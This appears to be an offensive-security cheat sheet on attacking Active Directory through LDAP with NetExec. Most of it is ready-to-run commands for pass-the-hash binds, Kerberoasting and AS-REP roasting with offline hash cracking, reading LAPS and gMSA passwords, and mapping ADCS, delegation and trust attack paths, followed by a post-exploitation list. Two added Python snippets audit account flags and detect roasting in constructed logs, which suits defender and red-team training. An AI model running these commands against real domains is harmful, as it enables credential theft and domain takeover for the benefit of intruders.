# LDAP Operations with NetExec

## Overview
LDAP (389/TCP, 636/TCP for LDAPS) is the directory access protocol for Active Directory. NetExec's LDAP module enables domain enumeration, credential validation, Kerberoasting, AS-REP roasting, and enumeration of ADCS, LAPS, gMSA, delegation, and trust configurations — all without touching SMB or requiring local admin rights.
LDAP operations are often lower-noise than SMB equivalents and work with standard domain user credentials (no admin required for most queries).
## Prerequisites
- Network access to Domain Controller on LDAP (389/TCP) or LDAPS (636/TCP)
- Valid domain credentials (or anonymous bind if enabled)
- NetExec installed
## Credential Validation

```bash
# Validate domain credentials via LDAP
netexec ldap 10.10.10.5 -u user -p pass
# [+] → valid credentials
# [-] → invalid

# Domain context (explicit)
netexec ldap 10.10.10.5 -u user -p pass -d domain.local

# Pass-the-hash via LDAP (NTLM bind)
netexec ldap 10.10.10.5 -u user -H ':NTHASH'

# LDAPS (SSL)
netexec ldap 10.10.10.5 -u user -p pass --port 636
```
## User and Group Dumping

```bash
# Dump all domain users
netexec ldap 10.10.10.5 -u user -p pass --users
# Output: username, display name, email, description, last logon, groups

# Dump all domain groups with members
netexec ldap 10.10.10.5 -u user -p pass --groups
# Output: group name, scope, members

# Filter users by attribute
netexec ldap 10.10.10.5 -u user -p pass --users --filter "(&(objectClass=user)(adminCount=1))"
# Returns only protected/admin users (adminCount=1 is set by AdminSDHolder)

# Dump a specific OU
netexec ldap 10.10.10.5 -u user -p pass --users --base-dn "OU=Finance,DC=domain,DC=local"
```
## Kerberoasting

```bash
# Kerberoast all users with SPNs
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
# Output file: kerberoast.txt (hashcat mode 13100 format)

# Kerberoasting with pass-the-hash instead of a password
netexec ldap 10.10.10.5 -u user -H ':NTHASH' --kerberoasting kerberoast.txt

# Crack offline
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
john kerberoast.txt --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
```
## AS-REP Roasting

```bash
# Find and roast users with "Do not require Kerberos preauthentication" set
netexec ldap 10.10.10.5 -u user -p pass --asreproast asrep.txt
# Output file: asrep.txt (hashcat mode 18200 format)

# AS-REP roasting without credentials (only if anonymous LDAP bind is allowed)
netexec ldap 10.10.10.5 -u '' -p '' --asreproast asrep.txt

# Crack offline
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
john asrep.txt --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
```
## ADCS Enumeration

```bash
# Enumerate Active Directory Certificate Services
netexec ldap 10.10.10.5 -u user -p pass -M adcs
# Lists: CA servers, certificate templates, vulnerable templates (ESC1–ESC15)
# Critical for planning ADCS attack paths

# Check a specific template
netexec ldap 10.10.10.5 -u user -p pass -M adcs -o TEMPLATE='WebServer'
```
## LAPS and gMSA

```bash
# Check which computers have LAPS enabled
netexec ldap 10.10.10.5 -u user -p pass -M laps
# Lists: computers with LAPS, password expiration, password visibility

# Read LAPS password (requires LAPS read permission)
netexec ldap 10.10.10.5 -u laps_reader -p pass -M laps -o READ=true

# Enumerate gMSA (Group Managed Service Accounts)
netexec ldap 10.10.10.5 -u user -p pass --gmsa
# Lists: gMSA accounts, associated hosts, password retrieval permission

# Read gMSA password (requires read permission on msDS-ManagedPassword for the gMSA object)
netexec ldap 10.10.10.5 -u gmsa_reader -p pass --gmsa -o READ=true
```
## Delegation Enumeration

```bash
# Find all delegation types
netexec ldap 10.10.10.5 -u user -p pass -M delegation
# Unconstrained delegation: computer can impersonate ANY user who authenticates to it
# Constrained delegation: computer can impersonate specific users TO specific services
# RBCD (Resource-Based Constrained Delegation): computer can be delegated TO by specified accounts

# Find accounts trusted for (unconstrained) delegation
netexec ldap 10.10.10.5 -u user -p pass --trusted-for-delegation
# These accounts can request TGTs on behalf of any user — high-value targets

# Find accounts with constrained delegation
netexec ldap 10.10.10.5 -u user -p pass --constrained-delegation
```
## Domain Trusts and Topology

```bash
# Enumerate domain trusts
netexec ldap 10.10.10.5 -u user -p pass --trusts
# Shows: trusted domains, trust direction, trust type, SID filtering status

# Enumerate subnets (AD Sites and Services)
netexec ldap 10.10.10.5 -u user -p pass --subnets
# Shows: subnet definitions, associated sites, location information

# Machine Account Quota (MAQ)
netexec ldap 10.10.10.5 -u user -p pass --maq
# Default: 10 (any domain user can create up to 10 machine accounts)
# If > 0: you can create a machine account for RBCD attacks
```
## BloodHound Collection

```bash
# Collect BloodHound data via LDAP (no on-target execution needed)
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound
# Output: BloodHound-compatible JSON files
# Collection: users, groups, computers, ACLs, sessions, trusts, GPOs

# With specific collection methods
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound -o COLLECTION_METHOD='ACL,Group,Trusts,ObjectProps'

# Import into BloodHound CE
# Upload the JSON files via the BloodHound CE web UI (http://localhost:8080)
```
## Advanced LDAP Queries

```bash
# Custom LDAP filter (1.2.840.113556.1.4.803 is the bitwise-AND matching rule on userAccountControl)
netexec ldap 10.10.10.5 -u user -p pass --filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
# Finds users with the "Password never expires" flag (DONT_EXPIRE_PASSWORD = 0x10000 = 65536)

# Find users with old passwords (pwdLastSet > 90 days)
netexec ldap 10.10.10.5 -u user -p pass --users | grep -E "pwdLastSet.*202[0-3]"
# Crude heuristic: matches pwdLastSet values dated 2020-2023; adjust the year range to the current date

# Find disabled users (ACCOUNTDISABLE = 0x2); potential re-enable targets
netexec ldap 10.10.10.5 -u user -p pass --filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))"

# Find computers with old OS versions
netexec ldap 10.10.10.5 -u user -p pass --filter "(&(objectClass=computer)(operatingSystem=*Server 2008*))"
```
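As an added example (not NetExec code and not from the page's author), the same conditions the filters above select, checked offline over constructed LDAP user records: it decodes the `userAccountControl` bits those filters test and converts `pwdLastSet` (a Windows FILETIME) into a real age in days instead of grepping for a year, and it goes a little beyond the filters by also flagging SPNs and the unconstrained-delegation bit. The record layout, the sample accounts and the 90-day threshold are assumptions.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bit values (MS-ADTS)
ACCOUNTDISABLE = 0x0002
DONT_EXPIRE_PASSWORD = 0x10000      # "Password never expires"
TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
DONT_REQ_PREAUTH = 0x400000         # AS-REP roastable
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft: int) -> datetime:
    """pwdLastSet/lastLogon are 100-ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10

def audit_user(rec: dict, now: datetime, max_pwd_age_days: int = 90) -> list:
    uac = int(rec["userAccountControl"])
    findings = []
    if uac & ACCOUNTDISABLE:
        findings.append("disabled")
    if uac & DONT_EXPIRE_PASSWORD:
        findings.append("password-never-expires")
    if uac & DONT_REQ_PREAUTH:
        findings.append("no-preauth (AS-REP roastable)")
    if uac & TRUSTED_FOR_DELEGATION:
        findings.append("unconstrained-delegation")
    if rec.get("servicePrincipalName"):
        findings.append("has-SPN (Kerberoastable)")
    # pwdLastSet == 0 (never set / must change) is treated as stale too
    pwd_set = int(rec.get("pwdLastSet", 0))
    if (now - filetime_to_datetime(pwd_set)).days > max_pwd_age_days:
        findings.append("stale-password")
    return findings

NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_USERS = [  # constructed records, not from a real domain
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,  # NORMAL_ACCOUNT|DONT_EXPIRE
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"],
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=400))},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200,
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=30))},
    {"sAMAccountName": "oldadmin", "userAccountControl": 0x202,  # NORMAL_ACCOUNT|ACCOUNTDISABLE
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=900))},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x400200,  # NORMAL_ACCOUNT|DONT_REQ_PREAUTH
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=10))},
]

def audit_all(users=SAMPLE_USERS, now=NOW) -> dict:
    return {u["sAMAccountName"]: audit_user(u, now) for u in users}
```

The same `audit_user` function works unchanged on the attribute dictionaries an LDAP client returns, as long as `pwdLastSet` is passed as the raw integer.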
## Common Pitfalls

- ⚠️ Anonymous LDAP disabled: Most domains disable anonymous LDAP binds. You'll need at least a low-privileged domain user credential for most operations.
- ⚠️ LDAP channel binding: DCs with LDAP channel binding enabled block NTLM-based LDAP binds (pass-the-hash over LDAP won't work). Use Kerberos authentication instead.
- ⚠️ LDAPS required: Some domains enforce LDAPS (636/TCP) and reject plaintext LDAP. Use the `--port 636` flag.
- ⚠️ Rate limiting: DCs may throttle excessive LDAP queries. Add jitter (`-j 2`) for large enumeration jobs.
## OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | LDAP bind event |
| User/group dump | Low | Standard LDAP read queries |
| Kerberoasting | Medium | TGS-REQ for each SPN (4769 on DC) |
| AS-REP roasting | Low | AS-REQ without preauth (4768 on DC) |
| ADCS enumeration | Low | LDAP reads on CA/template objects |
| LAPS/gMSA read | Low | LDAP read on specific attributes |
| BloodHound collection | Medium | High volume LDAP queries over short period |
| Delegation enumeration | Low | LDAP reads on computer/user objects |
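As an added example (not part of NetExec or of this page), the detection side of the Kerberoasting and AS-REP roasting rows above, run over constructed Security event records in a flattened `key=value` form: Kerberoasting appears as one account requesting RC4 (`0x17`) service tickets for many distinct SPNs within a short window (event 4769), AS-REP roasting as a 4768 issued with Pre-Authentication Type 0. The log layout, field names, sample lines and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for etype 23; AES tickets are 0x11/0x12

def parse_event(line: str) -> dict:
    """Parse a flattened 'key=value' event line (constructed format)."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["Time"] = datetime.fromisoformat(fields["Time"])
    return fields

def detect_kerberoast(events, window=timedelta(minutes=5), min_spns=4):
    """Flag accounts that requested RC4 service tickets for >= min_spns distinct
    services inside `window` (one TGS-REQ per SPN is the roasting signature)."""
    by_user = defaultdict(list)
    for e in events:
        if e.get("EventID") == "4769" and e.get("TicketEncryptionType") == RC4_HMAC:
            by_user[e["TargetUserName"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["Time"])
        for i, start in enumerate(evs):
            spns = {e["ServiceName"] for e in evs[i:] if e["Time"] - start["Time"] <= window}
            if len(spns) >= min_spns:
                alerts.append((user, start["IpAddress"], len(spns)))
                break
    return alerts

def detect_asrep_roast(events):
    """4768 with PreAuthType 0 means a TGT was issued without pre-authentication."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e.get("EventID") == "4768" and e.get("PreAuthType") == "0"]

SAMPLE_LOG = """\
Time=2024-06-01T09:00:01 EventID=4769 TargetUserName=jdoe@DOMAIN.LOCAL ServiceName=MSSQLSvc/sql01 TicketEncryptionType=0x17 IpAddress=10.10.10.50
Time=2024-06-01T09:00:02 EventID=4769 TargetUserName=jdoe@DOMAIN.LOCAL ServiceName=HTTP/web01 TicketEncryptionType=0x17 IpAddress=10.10.10.50
Time=2024-06-01T09:00:03 EventID=4769 TargetUserName=jdoe@DOMAIN.LOCAL ServiceName=CIFS/fs01 TicketEncryptionType=0x17 IpAddress=10.10.10.50
Time=2024-06-01T09:00:04 EventID=4769 TargetUserName=jdoe@DOMAIN.LOCAL ServiceName=ldap/dc01 TicketEncryptionType=0x17 IpAddress=10.10.10.50
Time=2024-06-01T09:30:00 EventID=4769 TargetUserName=asmith@DOMAIN.LOCAL ServiceName=HTTP/web01 TicketEncryptionType=0x12 IpAddress=10.10.10.51
Time=2024-06-01T09:31:00 EventID=4768 TargetUserName=legacy_app PreAuthType=0 IpAddress=10.10.10.50
Time=2024-06-01T09:32:00 EventID=4768 TargetUserName=jdoe PreAuthType=2 IpAddress=10.10.10.50
"""  # constructed sample events, not real DC logs

def run(log: str = SAMPLE_LOG):
    events = [parse_event(l) for l in log.splitlines() if l.strip()]
    return detect_kerberoast(events), detect_asrep_roast(events)
```

The normal AES ticket request from `asmith` and the normal pre-authenticated 4768 for `jdoe` produce no alert; only the RC4 burst and the no-preauth TGT do.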
## Post-Exploitation Value
- User list → password spray targets, Kerberoasting candidates
- Group memberships → identify Domain Admins, privileged groups
- Kerberoastable accounts → offline cracking → plaintext credentials
- AS-REP roastable accounts → offline cracking (no credentials needed)
- ADCS vulnerable templates → certificate-based privilege escalation
- LAPS passwords → local admin on specific computers
- gMSA passwords → service account compromise
- Delegation targets → privilege escalation via impersonation
- Trust relationships → cross-forest attack paths
- BloodHound data → graph-based attack path analysis
## Cross-References
- SMB Operations — Complementary host-level enumeration
- AD Attacks via NetExec — Full attack chains
- Kerberoasting — Detailed Kerberoasting technique
- AS-REP Roasting — Detailed AS-REP technique
- ADCS Exploitation — Certificate attack details
- ACL Abuse — Exploiting LDAP ACL misconfigurations
- LDAP Enumeration — Manual LDAP enumeration
## Tool References
- NetExec LDAP Documentation
- BloodHound CE
- certipy-ad — ADCS attack tool